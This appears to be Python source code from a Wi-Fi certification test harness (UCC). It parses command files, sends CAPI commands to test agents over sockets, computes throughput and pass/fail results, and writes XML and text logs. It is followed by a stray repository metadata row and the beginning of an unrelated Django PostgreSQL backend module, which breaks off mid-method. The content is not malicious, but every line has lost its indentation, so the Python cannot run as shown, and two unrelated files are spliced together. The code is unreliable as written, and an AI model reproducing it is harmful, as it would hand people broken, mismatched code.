else:
logging.debug("WTS Comp[%s][%s][%s][%s]" % (vInfo[1], vInfo[2], vInfo[3], vInfo[4]))
XLogger.AddWTSComponent(vInfo[0], vInfo[1], "%s:%s:%s" % (vInfo[2], vInfo[3], vInfo[4]))
logging.debug(vInfo)
return
if re.search("STA", command[0]):
if command[0] in retValueTable:
command[0] = retValueTable[command[0]]
else:
return
if command[0].lower() == 'exit':
set_color(FOREGROUND_CYAN | FOREGROUND_INTENSITY)
wfa_sys_exit("Exiting - %s" % command[1])
if command[0].lower() == 'pause':
set_color(FOREGROUND_YELLOW | FOREGROUND_INTENSITY)
            logging.info("Execution Paused - %s \n Press any key to continue..." % command[1])
sys.stdin.read(1)
set_color(FOREGROUND_INTENSITY)
return
if command[0].lower() == 'sleep':
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
time.sleep(float(command[1]))
return
if command[0].lower() == 'userinput':
set_color(FOREGROUND_YELLOW | FOREGROUND_INTENSITY)
logging.info("[USER INPUT REQUIRED]")
udata = raw_input(command[1])
if command[2] in retValueTable:
retValueTable[command[2]] = udata
else:
retValueTable.setdefault(command[2], udata)
set_color(FOREGROUND_INTENSITY)
return
if command[0].lower() == 'userinput_ifnowts':
if retValueTable["$WTS_ControlAgent_Support"] == "0":
set_color(FOREGROUND_YELLOW | FOREGROUND_INTENSITY)
logging.info("[USER INPUT REQUIRED]")
udata = raw_input(command[1])
if command[2] in retValueTable:
retValueTable[command[2]] = udata
else:
retValueTable.setdefault(command[2], udata)
set_color(FOREGROUND_INTENSITY)
return
if command[0].lower() == 'ifnowts':
if retValueTable["$WTS_ControlAgent_Support"] == "0":
set_color(FOREGROUND_YELLOW | FOREGROUND_INTENSITY)
if len(command) > 3 and command[2] in retValueTable:
s = "- %s" % retValueTable[command[2]]
else:
s = ""
logging.info("%s %s\n Press any key to continue after done" % (command[1], s))
sys.stdin.read(1)
set_color(FOREGROUND_INTENSITY)
return
if command[0] == 'wfa_control_agent' or command[0] == 'wfa_control_agent_dut':
if retValueTable["$WTS_ControlAgent_Support"] == "0":
return
if command[0].lower() == 'getuccsystemtime':
timeStr = time.strftime("%H-%M-%S-%m-%d-%Y", time.localtime())
logging.debug("\n Reading UCC System time %s" % timeStr)
t = timeStr.split("-")
retValueTable.setdefault("$month", t[3])
retValueTable.setdefault("$date", t[4])
retValueTable.setdefault("$year", t[5])
retValueTable.setdefault("$hours", t[0])
retValueTable.setdefault("$minutes", t[1])
retValueTable.setdefault("$seconds", t[2])
logging.debug("""\n UCC System Time -
Month:%s:
Date:%s:
Year:%s:
Hours:%s:
Minutes:%s:
Seconds:%s:""" %
(retValueTable["$month"],
retValueTable["$date"],
retValueTable["$year"],
retValueTable["$hours"],
retValueTable["$minutes"],
retValueTable["$seconds"]))
return
if command[0].lower() == 'r_info':
rdata = "-"
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
if len(command) > 1:
rdata = command[2]
resultPrinted = 1
set_test_result(command[1], rdata, "-")
XLogger.setTestResult(command[1], rdata)
wfa_sys_exit_0()
return
if command[0].lower() == 'info':
set_color(FOREGROUND_CYAN | FOREGROUND_INTENSITY)
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
logging.info("\n %7s ~~~~~ %s ~~~~~ \n" %("", command[1]))
set_color(FOREGROUND_INTENSITY)
return
if re.search('esultIBSS', command[0]):
time.sleep(5)
printStreamResults()
process_passFailIBSS(command[1])
return
elif re.search('define', command[0]):
logging.debug("..Define %s = %s"%(command[1], command[2]))
if command[1] in retValueTable:
if command[2] in retValueTable:
command[2] = retValueTable[command[2]]
retValueTable[command[1]] = command[2]
else:
if command[2] in retValueTable:
command[2] = retValueTable[command[2]]
retValueTable.setdefault(command[1], command[2])
return
elif command[0].lower() == 'echo':
if command[1] in retValueTable:
logging.info("%s=%s" % (command[1], retValueTable[command[1]]))
else:
logging.info("Unknown variable %s" %command[1])
return
elif command[0].lower() == 'echo_ifnowts' and retValueTable["$WTS_ControlAgent_Support"] == "0":
if command[1] in retValueTable:
logging.info("-%s=%s-" % (command[1], retValueTable[command[1]]))
else:
logging.info("%s" % command[1])
return
elif command[0].lower() == 'storethroughput':
cmd = command[2].split(",")
logging.debug("Storing the Throughput(Mbps) value of stream %s[%s %s] in %s duration=%s p=%s", cmd[0], cmd[3], "%", command[1], retValueTable[cmd[2]], cmd[1])
P1 = -1
for p in streamRecvResultArray:
if p.streamID == retValueTable[cmd[0]] and int(p.phase) == int(cmd[1]):
P1 = p.rxBytes
P1 = int(int(P1) / 100) * int(cmd[3])
P1 = ((float(P1) * 8))/(1000000 * int(retValueTable[cmd[2]]))
break
logging.info("Storing %s = %s [Mbps]", command[1], P1)
if command[1] in retValueTable:
retValueTable[command[1]] = P1
else:
retValueTable.setdefault(command[1], P1)
return
elif command[0].lower() == 'resultwmm':
time.sleep(5)
printStreamResults()
process_passFailWMM(command[1])
return
elif command[0].lower() == 'resultwmm_1':
time.sleep(5)
printStreamResults()
process_passFailWMM_1(command[1])
return
elif re.search('CheckThroughput', command[0]):
time.sleep(5)
printStreamResults()
process_CheckThroughput(command[1], 0)
return
elif re.search('CheckMCSThroughput', command[0]):
time.sleep(5)
printStreamResults()
process_CheckMCSThroughput(command[1])
return
elif re.search('CheckDT4Result', command[0]):
time.sleep(5)
printStreamResults()
process_CheckDT4(command[1])
return
elif re.search('TransactionThroughput', command[0]):
time.sleep(5)
printStreamResults()
process_CheckThroughput(command[1], 1)
return
elif re.search('esultCheck', command[0]):
time.sleep(5)
process_ResultCheck(command[1])
return
logging.debug("COMMAND - to %s" % command[0])
if command[0] == 'wfa_test_commands':
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
process_cmdfile("%s%s"%(uccPath, command[1]))
return
if command[0] == 'Phase':
RTPCount = 1
time.sleep(3)
logging.debug("Starting Phase - %s ..." % command[1])
runningPhase = command[1]
threadCount = 0
testRunning = 0
time.sleep(2)
return
if len(command) < 3:
logging.error('Incorrect format of line - %s', line)
return
ret_data_def = command[2]
ret_data_def_type = ret_data_def.split(',')
logging.debug("Command Return Type = %s" % (ret_data_def_type[0].lower()))
if ret_data_def_type[0] == 'STREAMID' or ret_data_def_type[0] == 'INTERFACEID' or ret_data_def_type[0] == 'PING':
ret_data_idx = ret_data_def_type[1]
elif ret_data_def_type[0] == 'RECV_ID':
recv_value = ret_data_def_type[1].split(' ')
i = 0
for r in recv_value:
recv_id[i] = r
i += 1
logging.debug('RECV ID %s', recv_id)
elif ret_data_def_type[0] == 'FILENAME':
upload_file_desc = open(ret_data_def_type[1], 'a')
logging.info('File desc= %s', upload_file_desc)
logging.info('Uploading to file - %s', ret_data_def_type[1])
if command[0] in retValueTable:
toaddr = retValueTable[command[0]]
else:
return
displayName = toaddr
if toaddr in DisplayNameTable:
displayName = DisplayNameTable[toaddr]
capi_run = command[1].strip()
capi_elem = command[1].split(',')
logging.debug("%s (%-15s) --> %s " % (displayName, toaddr, capi_elem))
if capi_elem[0] == 'traffic_agent_receive_stop':
idx = capi_elem.index('streamID')
# Wait for Send to finish, in case of receive_stop
sid = capi_elem[2].split(' ')
capi_elem[idx+1] = ''
for i in sid:
val = retValueTable[i]
if re.search(";", retValueTable[i]):
val = retValueTable[i].split(";")[0]
for p in streamInfoArray:
if p.pairID == retValueTable[i] and p.phase == runningPhase:
while p.status != 1:
#Minor sleep to avoid 100% CPU Usage by rapid while
time.sleep(0.1)
if multicast == 1:
capi_elem[idx+1] = val
break
else:
capi_elem[idx+1] += val
capi_elem[idx+1] += ' '
break
elif multicast == 1:
capi_elem[idx+1] = val
capi_run = ','.join(capi_elem)
capi_cmd = capi_run + ' \r\n'
logging.info("%s (%-10s) --> %s" % (displayName, toaddr, capi_cmd))
asock = conntable.get(toaddr)
asock.send(capi_cmd)
time.sleep(15)
return
elif capi_elem[0] == 'traffic_agent_send':
idx = capi_elem.index('streamID')
sid = capi_elem[2].split(' ')
capi_elem[idx+1] = ''
rCounter = 0
for i in sid:
#Making Send-receive Pair
for s in streamInfoArray:
if s.IPAddress == toaddr and s.streamID == retValueTable[i] and s.phase == runningPhase:
s.pairID = retValueTable[recv_id[rCounter]]
if re.search(";", retValueTable[i]):
val = retValueTable[i].split(";")[0]
else:
val = retValueTable[i]
capi_elem[idx+1] += val
capi_elem[idx+1] += ' '
rCounter += 1
capi_run = ','.join(capi_elem)
logging.info("%s (%-15s) --> %s " %(displayName, toaddr, capi_run))
# Pass the receiver ID for send stream
# Start the response wait thread (only once)
if threadCount == 0:
testRunning = 1
thread.start_new(responseWaitThreadFunc, (threadCount, capi_run, toaddr, recv_id))
threadCount = threadCount + 1
#Temporary Addition for VHT
capi_cmd = capi_run + ' \r\n'
asock = conntable.get(toaddr)
asock.send(capi_cmd)
return
else:
if capi_elem[0] == 'sniffer_control_stop':
time.sleep(2)
testRunning = 0
time.sleep(2)
#Replacing the placeholder(s) in command.
for id in retValueTable:
elementCounter = 0
for capiElem in capi_elem:
if capiElem == id:
if re.search(";", retValueTable[id]):
val = retValueTable[id].split(";")[0]
else:
val = retValueTable[id]
capi_elem[elementCounter] = val
logging.debug("Replacing the placeholder %s %s" % (id, capi_elem[elementCounter]))
elementCounter += 1
if capi_elem[0] == 'sta_up_load':
seq_no = 1
code_no = 1
while code_no != '0':
capi_elem[3] = "%s" % seq_no
seq_no += 1
status = send_capi_command(toaddr, capi_elem)
ss = status.rstrip('\r\n')
logging.debug("%s (%s) <--- %s" % (displayName, toaddr, ss))
stitems = ss.split(',')
if stitems[1] == "COMPLETE" and len(stitems) > 3:
upload_file_desc.write(stitems[4])
code_no = stitems[3]
upload_file_desc.close()
return
else:
if capi_elem[0] == 'sta_is_connected':
isConnectRetry = 0
while isConnectRetry < 10:
isConnectRetry = isConnectRetry + 1
time.sleep(4)
status = send_capi_command(toaddr, capi_elem)
ss = status.rstrip('\r\n')
logging.info("%s (%-15s) <-- %s" % (displayName, toaddr, ss))
stitems = ss.split(',')
if stitems[1] == "COMPLETE" and len(stitems) > 3:
retValueTable.setdefault("$IS_CONNECTED", stitems[3])
if "PingInternalChk" in retValueTable:
if retValueTable["PingInternalChk"] == "0":
                                logging.debug("Skipping IS_CONNECTED check")
return
elif stitems[3] == '1':
return
else:
continue
else:
if stitems[3] == '1':
return
else:
continue
wfa_sys_exit("\n NO ASSOCIATION -- Aborting the test")
else:
status = send_capi_command(toaddr, capi_elem)
ss = status.rstrip('\r\n')
logging.info("%s (%-15s) <-- %s" % (displayName, toaddr, ss))
#Exit in case of ERROR
                if (re.search('ERROR', ss) or re.search('INVALID', ss)) and iDNB == 0 and iINV == 0:
set_test_result("ERROR", "-", "Command returned Error")
wfa_sys_exit(" Command returned Error. Aborting the test")
stitems = ss.split(',')
if stitems[1] == "COMPLETE" and len(stitems) > 3:
if stitems[2] == 'streamID':
if capi_elem[4] == 'send':
streamInfoArray.append(streamInfo("%s;%s" %(stitems[3], toaddr), toaddr, -1, 'send', capi_elem[16], capi_elem[18], runningPhase, RTPCount))
RTPCount = RTPCount+1
else:
streamInfoArray.append(streamInfo("%s;%s" %(stitems[3], toaddr), toaddr, -1, 'receive', -1, -1, runningPhase, -1))
if capi_elem[2] == 'Multicast':
logging.debug("----MULTICAST----")
multicast = 1
if ret_data_idx in retValueTable:
retValueTable[ret_data_idx] = ("%s;%s" %(stitems[3], toaddr))
else:
retValueTable.setdefault(ret_data_idx, "%s;%s" %(stitems[3], toaddr))
elif stitems[2] == 'interfaceType':
retValueTable.setdefault(ret_data_idx, stitems[5])
elif stitems[2].lower() == 'interfaceid':
if ret_data_idx in retValueTable:
retValueTable[ret_data_idx] = stitems[3].split('_')[0]
else:
retValueTable.setdefault(ret_data_idx, stitems[3].split('_')[0])
elif capi_elem[0] == 'traffic_stop_ping':
retValueTable["%s;%s"%(capi_elem[2], toaddr)] = stitems[5]
logging.debug("%s = %s" % (capi_elem[2], retValueTable["%s;%s"%(capi_elem[2], toaddr)]))
if "PingInternalChk" in retValueTable:
if retValueTable["PingInternalChk"] == "0":
logging.debug("Ping Internal Check")
elif stitems[5] == '0':
wfa_sys_exit("\n NO IP Connection -- Aborting the test")
else:
if stitems[5] == '0':
wfa_sys_exit("\n NO IP Connection -- Aborting the test")
if ret_data_def_type[0].lower() == "id":
i = 0
for s in stitems:
if(int(i)%2 == 0) and len(stitems) > i+1:
logging.debug("--------> Adding %s = %s"%(ret_data_def_type[i/2], stitems[i+1]))
stitems[i+1] = stitems[i+1].rstrip(' ')
stitems[i+1] = stitems[i+1].rstrip('\n')
stitems[i+1] = stitems[i+1].rstrip('\r')
if ret_data_def_type[i/2] in retValueTable:
retValueTable[ret_data_def_type[i/2]] = stitems[i+1]
else:
retValueTable.setdefault(ret_data_def_type[i/2], stitems[i+1])
i = int(i) + 1
elif stitems[1] != "COMPLETE" and iINV == 0 and iDNB == 0:
logging.info('Command %s not completed' % capi_run)
if capi_elem[0] == 'sta_associate':
time.sleep(10)
except:
exc_info = sys.exc_info()
logging.error(exc_info[1])
wfa_sys_exit("")
def send_capi_command(toaddr, capi_elem):
"""
Send CAPI commands through socket based on IP address and
port number
Parameters
----------
toaddr : str
IP address and port number
capi_elem : tuple of str
CAPI command followed by parameters with "," as delimiter
Returns
-------
status : str
Contains string specifying command is running, complete
or returning values
Examples
--------
send_capi_command(192.168.0.1:9000, ca_get_version)
send_capi_command(192.168.0.1:9000, sniffer_control_filter_capture,
infile,_521-step1,outfile,521-step1_A,
srcmac,00:11:22:33:44:55,destmac,55:44:33:22:11:00)
"""
global iDNB, iINV
capi_run = ','.join(capi_elem)
capi_cmd = capi_run + ' \r\n'
asock = conntable.get(toaddr)
asock.send(capi_cmd)
displayaddr = toaddr
if toaddr in DisplayNameTable:
displayaddr = DisplayNameTable[toaddr]
logging.info("%s (%-15s) ---> %s" % (displayaddr, toaddr, capi_cmd.rstrip('\r\n')))
status = asock.recv(2048)
logging.debug("%s (%s) <--- %s" % (displayaddr, toaddr, status.rstrip('\r\n')))
# Status,Running
# Quick fix for case where AzWTG sends response RUNNING and COMPLETED in one read
if len(status) > 25:
status = status.split('\n')
status = status[1]
else:
if iDNB == 0:
status = asock.recv(2048)
else:
iDNB = 0
if displayaddr == cSLog.name:
cSLog.log("%s ---> %s" % (displayaddr, capi_cmd.rstrip('\r\n')))
cSLog.log("%s <--- %s\n" % (displayaddr, status.rstrip('\r\n')))
if re.search("FAIL", status) and re.search("SNIFFER", displayaddr) and iINV == 0:
logging.info("%s <--- %s\n" % (displayaddr, status.rstrip('\r\n')))
wfa_sys_exit("Command returned FAIL")
return status
def process_cmdfile(line):
"""
Process the file line by line based on file name and path specified
Parameters
----------
line : str
File name and path
Returns
-------
none
Example
--------
process_cmdfile(C:\\WTS_UCC_Windows\\cmds\\11n\\STA_5.2.1.txt)
"""
i = 0
line = line.rstrip()
filelist = []
filelist = line.split(',')
nfile = len(filelist)
while i < nfile:
logging.debug('Command file ---' + filelist[i])
file = open(filelist[i])
scanner(file, process_cmd)
file.close()
i = i+1
def set_test_result(result, data, rdata):
XLogger.setTestResult(result, data, rdata)
if re.search("PASS", result):
set_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
logging.info("\n TEST RESULT ---> %15s" % result)
elif re.search("FAIL", result):
set_color(FOREGROUND_RED |FOREGROUND_INTENSITY)
logging.info("\n TEST RESULT ---> %15s | %s |" % (result, data))
def process_passFailWMM_1(line):
"""Determines pass or fail for WMM based on results and what is expected"""
global runningPhase
try:
cmd = line.split(',')
P1 = -1
P2 = -1
for p in streamRecvResultArray:
if p.streamID == retValueTable[cmd[0]] and int(p.phase) == int(runningPhase):
P1 = p.rxBytes
elif p.streamID == retValueTable[cmd[1]] and int(p.phase) == int(runningPhase):
P2 = p.rxBytes
if cmd[2] in retValueTable:
cmd[2] = retValueTable[cmd[2]]
if (int(P2) <= 0) or (int(P1) <= 0):
actual = -1
else:
actual = (float(P2) / float(P1)) * 100
if actual <= long(cmd[2]):
set_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
result = cmd[3]
else:
set_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
result = cmd[4]
logging.info("\n ----------------RESULT---------------------------\n")
logging.info("Expected <= %s %s" % (cmd[2], "%"))
logging.info("Actual - %6.6s %s" % (actual, "%"))
logging.info("TEST RESULT ---> %s" % result)
logging.info("\n ------------------------------------------------")
set_color(FOREGROUND_INTENSITY)
set_test_result(result, "%6.6s %s" % (actual, "%"), "<= %s %s" % (cmd[2], "%"))
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def process_passFailWMM(line):
"""Determines pass or fail for WMM based on two phases result and what is expected"""
try:
cmd = line.split(',')
P1 = -1
P2 = -1
for p in streamRecvResultArray:
if p.streamID == retValueTable[cmd[0]] and int(p.phase) == 1:
P1 = p.rxBytes
elif p.streamID == retValueTable[cmd[1]] and int(p.phase) == 2:
P2 = p.rxBytes
if cmd[2] in retValueTable:
cmd[2] = retValueTable[cmd[2]]
if (int(P2) <= 0) or (int(P1) <= 0):
actual = -1
else:
actual = (float(P2) / float(P1)) * 100
if actual > long(cmd[2]):
set_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
result = cmd[3]
else:
set_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
result = cmd[4]
logging.info("\n ----------------RESULT---------------------------\n")
logging.info("%s Phase 1 = %s Bytes | %s Phase 2 = %s Bytes " %(cmd[5], P1, cmd[5], P2))
logging.info("Expected > %s %s" % (cmd[2], "%"))
logging.info("Actual - %6.6s %s" % (actual, "%"))
logging.info("TEST RESULT ---> %s" % result)
logging.info("\n ------------------------------------------------")
set_color(FOREGROUND_INTENSITY)
set_test_result(result, "%6.6s %s" % (actual, "%"), "> %s %s" % (cmd[2], "%"))
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def process_passFailIBSS(line):
"""Determines pass or fail for IBSS based on results and what is expected"""
try:
cmd = line.split(',')
P1 = -1
logging.debug("Processing PASS/FAIL...")
for p in streamRecvResultArray:
if p.streamID == retValueTable[cmd[0]]:
P1 = p.rxBytes
break
logging.info(" Received = %s Bytes Duration = %s Seconds Expected = %s Mbps " % (P1, cmd[2], cmd[1]))
logging.debug(" B = %s B1 = %s" % (((long(P1) / 10000)), ((float(cmd[1]) * 125000))))
if int(P1) <= 0:
actual = -1
else:
actual = ((float(P1) * 8)) / (1000000 * int(cmd[2]))
logging.info("Expected = %s Mbps Received =%s Mbps" % (cmd[1], actual))
if float(actual) >= float(cmd[1]):
result = cmd[3]
else:
result = cmd[4]
set_test_result(result, "-", "-")
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def process_CheckThroughput(line, Trans):
    """Determines throughput and logs the actual and expected values"""
try:
cmd = line.split(',')
if cmd[2] in retValueTable:
cmd[2] = retValueTable[cmd[2]]
if cmd[3] in retValueTable:
cmd[3] = retValueTable[cmd[3]]
P1 = -1
logging.debug("Processing Throughput Check...")
if Trans:
for p in streamSendResultArray:
if p.streamID == retValueTable[cmd[0]] and int(p.phase) == int(cmd[1]):
P1 = p.rxBytes
break
else:
for p in streamRecvResultArray:
if p.streamID == retValueTable[cmd[0]] and int(p.phase) == int(cmd[1]):
P1 = p.rxBytes
break
if int(P1) <= 0:
actual = -1
else:
actual = ((float(P1) * 8))/(1000000 * int(cmd[2]))
condition = ">="
if float(actual) >= float(cmd[3]):
result = cmd[4]
if "fail" in result.lower():
condition = "<="
else:
result = cmd[5]
if "pass" in result.lower():
condition = "<="
logging.debug(" Received = %s Bytes Duration = %s Seconds Expected = %s Mbps " % (P1, cmd[2], cmd[3]))
logging.info("\n Expected %s %s Mbps Actual = %s Mbps" % (condition, cmd[3], actual))
set_test_result(result, "%s Mbps" %(actual), "%s Mbps" %(cmd[3]))
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
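# Worked example (added for clarity): the conversion above turns received bytes over
# the run duration into Mbps as (bytes * 8) / (1000000 * duration). With hypothetical
# numbers -- 12,500,000 bytes received over a 20 second phase --
# (12500000 * 8) / (1000000 * 20) = 5.0 Mbps, which is then compared against the
# expected throughput in cmd[3] to choose the pass or fail string.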
def process_CheckMCSThroughput(line):
    """Determines MCS throughput and logs the actual and expected values"""
try:
cmd = line.split(',')
logging.debug("process_CheckMCSThroughput")
logging.debug("-%s-%s-%s-%s-%s" % (cmd[0], cmd[1], cmd[2], cmd[3], cmd[4]))
TX = -1
RX1 = -1
RX2 = -1
logging.debug("Processing Throughput Check...")
for p in streamSendResultArray:
if p.streamID == retValueTable[cmd[1]] and int(p.phase) == int(cmd[0]):
TX = long(p.txBytes)
break
for p in streamRecvResultArray:
if p.streamID == retValueTable[cmd[2]] and int(p.phase) == int(cmd[0]):
RX1 = long(p.rxBytes)
if p.streamID == retValueTable[cmd[3]] and int(p.phase) == int(cmd[0]):
RX2 = long(p.rxBytes)
logging.debug("-%s-%s-%s-%s" % (TX, RX1, RX2, cmd[4]))
TX = (long(TX)* (float(cmd[4])/100))
actual = -1
if int(TX) <= 0:
actual = -1
else:
if RX1 > TX and RX2 > TX:
actual = 1
if float(actual) > 0:
result = cmd[5]
else:
result = cmd[6]
logging.info("\n MCS Expected %s bytes, actual %s bytes and %s bytes" % (TX, RX1, RX2))
set_test_result(result, "%s Bytes %s Bytes" %(RX1, RX2), "%s Bytes" % (TX))
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def process_CheckDT4(line):
"""Determines amount of DT4 packets and prints the results and expected to logs"""
try:
cmd = line.split(',')
logging.debug("process_Check DT4 Results")
logging.debug("-%s-%s-%s-%s-%s-%s" % (cmd[0], cmd[1], retValueTable[cmd[1]], cmd[2], cmd[3], cmd[4]))
RX = -1
for p in streamSendResultArray:
if p.streamID == retValueTable[cmd[1]] and int(p.phase) == int(cmd[0]):
RX = long(p.rxFrames)
logging.debug("-%s-%s" % (RX, cmd[2]))
actual = -1
if long(RX) > long(cmd[2]):
actual = 1
if float(actual) > 0:
result = cmd[3]
else:
result = cmd[4]
logging.info("\n DT4 Expected > %s packets, actual %s packets" % (cmd[2], RX))
set_test_result(result, "%s Packets" %(RX), "%s Packets" % (cmd[2]))
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def process_ResultCheck(line):
"""Determines pass or fail at the end of the test run"""
try:
cmd = line.split(',')
logging.debug("%s-%s-%s-%s-%s-%s" % (retValueTable[cmd[0]], int(retValueTable["%s" % retValueTable[cmd[0]]]), cmd[0], cmd[1], cmd[2], cmd[3]))
if int(retValueTable["%s" % retValueTable[cmd[0]]]) >= int(cmd[1]):
result = cmd[2]
else:
result = cmd[3]
XLogger.setTestResult(result)
logging.info("\nTEST RESULT ---> %15s" % result)
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def wfa_sys_exit(msg):
"""Exiting because an error has occurred"""
time.sleep(2)
set_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
if re.search("not applicable", msg) or re.search("not supported", msg):
XLogger.setTestResult("TEST N/A")
else:
XLogger.setTestResult("ABORTED123", msg)
XLogger.writeXML()
sys.exit(msg)
def wfa_sys_exit_0():
"""Exiting because a failure has occurred"""
time.sleep(2)
set_color(FOREGROUND_CYAN | FOREGROUND_INTENSITY)
logging.disable("ERROR")
XLogger.writeXML()
sys.exit(0)
class XMLLogHandler(logging.FileHandler):
def emit(self, record):
try:
XLogger.log(self.format(record))
self.flush()
except:
self.handleError(record)
XLogger = ""
def init_logging(_filename, level):
global cSLog, XLogger
p = _filename.split('\\')
resultCollectionFile = open("TestResults", "a")
for s in p:
tFileName = s
directory = "./log/%s_%s" %(tFileName.rstrip(".txt"), time.strftime("%b-%d-%Y__%H-%M-%S", time.localtime()))
os.mkdir(directory)
os.system("echo %s > p" % directory)
fname = "%s/log_%s.log" %(directory, tFileName.rstrip(".txt"))
fname_sniffer = "%s/sniffer_log_%s.log" % (directory, tFileName.rstrip(".txt"))
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename=fname,
filemode='w')
cSLog = classifiedLogs("SNIFFER", fname_sniffer, "SNIFFER CHECKS LOG - Testcase: %s \n\n" % tFileName.rstrip(".txt"))
# a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
if level == '2':
console.setLevel(logging.DEBUG)
else:
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
if level != '0':
logging.getLogger('').addHandler(console)
set_color(FOREGROUND_INTENSITY)
# Add XML Log Handler
XLogger = XMLLogger("%s/%s_%s.xml" %
(directory,
tFileName.rstrip(".txt"),
time.strftime("%Y-%m-%dT%H_%M_%SZ",
time.localtime())),
"%s" % (tFileName.rstrip(".txt")))
hXML = XMLLogHandler('t')
XMLformatter = logging.Formatter('%(message)s')
hXML.setFormatter(XMLformatter)
logging.getLogger('').addHandler(hXML)
logging.info("###########################################################\n")
logging.info("UCC Version - %s" % VERSION)
logging.info('Logging started in file - %s' % (fname))
def firstword(line):
global maxThroughput, payloadValue, uccPath
str = line.split('#')
command = str[0].split('!')
if command[0] == 'wfa_control_agent' or command[0] == 'wfa_control_agent_dut':
if retValueTable["$WTS_ControlAgent_Support"] != "0":
process_ipadd(command[1])
retValueTable.setdefault(command[0], "%s:%s" % ((command[1].split(',')[0]).split('=')[1], (command[1].split(',')[1]).split('=')[1]))
elif command[0] == 'wfa_console_ctrl' or command[0] == 'wfa_adept_control_agent' or re.search('control_agent_testbed_sta', command[0]) or re.search('control_agent', command[0]) or re.search('TestbedAPConfigServer', command[0]) or re.search('wfa_sniffer', command[0]) or re.search('ethernet', command[0]):
process_ipadd(command[1])
retValueTable.setdefault(command[0], "%s:%s" % ((command[1].split(',')[0]).split('=')[1], (command[1].split(',')[1]).split('=')[1]))
elif command[0].lower() == 'exit':
wfa_sys_exit("Exiting - %s" % command[1])
elif command[0].lower() == 'info':
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
logging.info("\n %7s ~~~~~ %s ~~~~~ \n" %("", command[1]))
elif command[0] == 'wfa_test_commands':
logging.debug('Processing wfa_test_commands')
process_cmdfile("%s%s" % (uccPath, command[1]))
elif command[0] == 'wfa_test_commands_init':
logging.debug('Processing init wfa_test_commands')
logging.debug("UCC Path = %s" % uccPath)
s1 = command[1]
scanner(open(uccPath + s1), firstword)
if "$TestNA" in retValueTable:
logging.error("%s" % retValueTable["%s" % "$TestNA"])
wfa_sys_exit("%s" % retValueTable["%s" % "$TestNA"])
elif command[0] == 'dut_wireless_ip' or command[0] == 'dut_default_gateway' or command[0] == 'wfa_console_tg' or re.search('wireless_ip', command[0]) or re.search('wmmps_console', command[0]) or re.search('tg_wireless', command[0]):
retValueTable.setdefault(command[0], command[1])
elif re.search('define', command[0]):
if command[2] in retValueTable:
command[2] = retValueTable[command[2]]
if command[1] in retValueTable:
retValueTable[command[1]] = command[2]
else:
retValueTable.setdefault(command[1], command[2])
elif re.search('DisplayName', command[0]):
if command[1] in retValueTable:
DisplayNameTable.setdefault(retValueTable[command[1]], command[2])
else:
DisplayNameTable.setdefault(command[1], command[2])
elif re.search('throughput', command[0]):
maxThroughput = command[1]
logging.info("Maximum Throughput %s Mbps" % maxThroughput)
retValueTable.setdefault(command[0], command[1])
elif re.search('payload', command[0]):
payloadValue = command[1]
logging.info("Payload = %s Bytes", (command[1]))
retValueTable.setdefault(command[0], command[1])
elif re.search('stream', command[0]):
logging.debug("STREAM = %s, Payload = %s Bytes, Percentage = %s %s of Maximum Throughput" %(command[0], payloadValue, command[1], "%"))
frameRate = int(maxThroughput) * int(command[1])*1250/int(payloadValue)
logging.info("%s %s Frames / second" % (command[0], frameRate))
retValueTable.setdefault(command[0], "%s" % frameRate)
if len(command) == 2:
logging.debug("Command = %s" % (command[1]))
| isc |
vinayan3/clpricehistory | django/db/backends/postgresql/creation.py | 247 | 3753 | from django.db.backends.creation import BaseDatabaseCreation
from django.db.backends.util import truncate_name
class DatabaseCreation(BaseDatabaseCreation):
# This dictionary maps Field objects to their associated PostgreSQL column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
data_types = {
'AutoField': 'serial',
'BooleanField': 'boolean',
'CharField': 'varchar(%(max_length)s)',
'CommaSeparatedIntegerField': 'varchar(%(max_length)s)',
'DateField': 'date',
'DateTimeField': 'timestamp with time zone',
'DecimalField': 'numeric(%(max_digits)s, %(decimal_places)s)',
'FileField': 'varchar(%(max_length)s)',
'FilePathField': 'varchar(%(max_length)s)',
'FloatField': 'double precision',
'IntegerField': 'integer',
'BigIntegerField': 'bigint',
'IPAddressField': 'inet',
'NullBooleanField': 'boolean',
'OneToOneField': 'integer',
'PositiveIntegerField': 'integer CHECK ("%(column)s" >= 0)',
'PositiveSmallIntegerField': 'smallint CHECK ("%(column)s" >= 0)',
'SlugField': 'varchar(%(max_length)s)',
'SmallIntegerField': 'smallint',
'TextField': 'text',
'TimeField': 'time',
}
def sql_table_creation_suffix(self):
assert self.connection.settings_dict['TEST_COLLATION'] is None, "PostgreSQL does not support collation setting at database creation time."
if self.connection.settings_dict['TEST_CHARSET']:
return "WITH ENCODING '%s'" % self.connection.settings_dict['TEST_CHARSET']
return ''
def sql_indexes_for_field(self, model, f, style):
if f.db_index and not f.unique:
qn = self.connection.ops.quote_name
db_table = model._meta.db_table
tablespace = f.db_tablespace or model._meta.db_tablespace
